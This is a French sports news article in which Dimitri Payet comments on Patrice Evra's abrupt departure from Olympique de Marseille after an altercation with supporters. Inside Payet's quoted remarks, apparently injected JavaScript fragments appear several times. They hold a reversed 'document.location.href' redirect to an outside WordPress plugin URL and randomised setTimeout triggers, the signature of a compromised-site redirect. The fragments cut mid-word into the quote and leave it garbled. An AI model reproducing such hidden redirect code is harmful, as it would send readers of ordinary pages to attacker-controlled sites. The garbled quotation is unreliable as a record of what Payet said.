SPORTS

Payet revient sur le cas Evra

Trois mois après la rupture de contrat entre Patrice Evra et l’OM, Dimitri Payet revient sur le départ brutal de son ancien partenaire, dans une interview accordée à beIN Sports.

Son contrat marseillais résilié le 10 novembre dernier, Patrice Evra a trouvé un nouveau challenge cette semaine en s’engageant en faveur de West Ham. Dans un entretien accordé ce dimanche à beIN Sports, Dimitri Payet revient sur le départ précipité du défenseur latéral, après une violente altercation avec des supporters phocéens en marge d’un match de Ligue Europa à Guimaraes.

J’ai compris son éviction, car c’est ce que j’ai vécu à West Ham, explique le capitaine olympien. Qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and il y a un point de non-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour avec les supporters, la situation est réglée. C’est pour ça que West Ham m’a lâché. Ils ont vu que les supporters ne me voulaient plus. Et qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and les supporters ne veulent plus, c’est compliqué. C’est un peu ce qu’a vécu Pat…

Et Payet de revenir sur le moment précis de l’échauffourée fatale à son expérimenté (ex)coéquipier. “Tout le groupe est intervenu. Il y a eu une réaction, mais il y a des supporters qui sont venus sur le terrain pour l’insulter. On ne dit pas qu’il a eu raison, mais il ne faut pas oublier qu’il y a eu une provocation. On est des hommes et il y a des choses qu’on ne peut pas laisser passer. S’il est allé jusque-là, c’est qu’il s’est passé quelque chose…

Source: Sports.fr

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :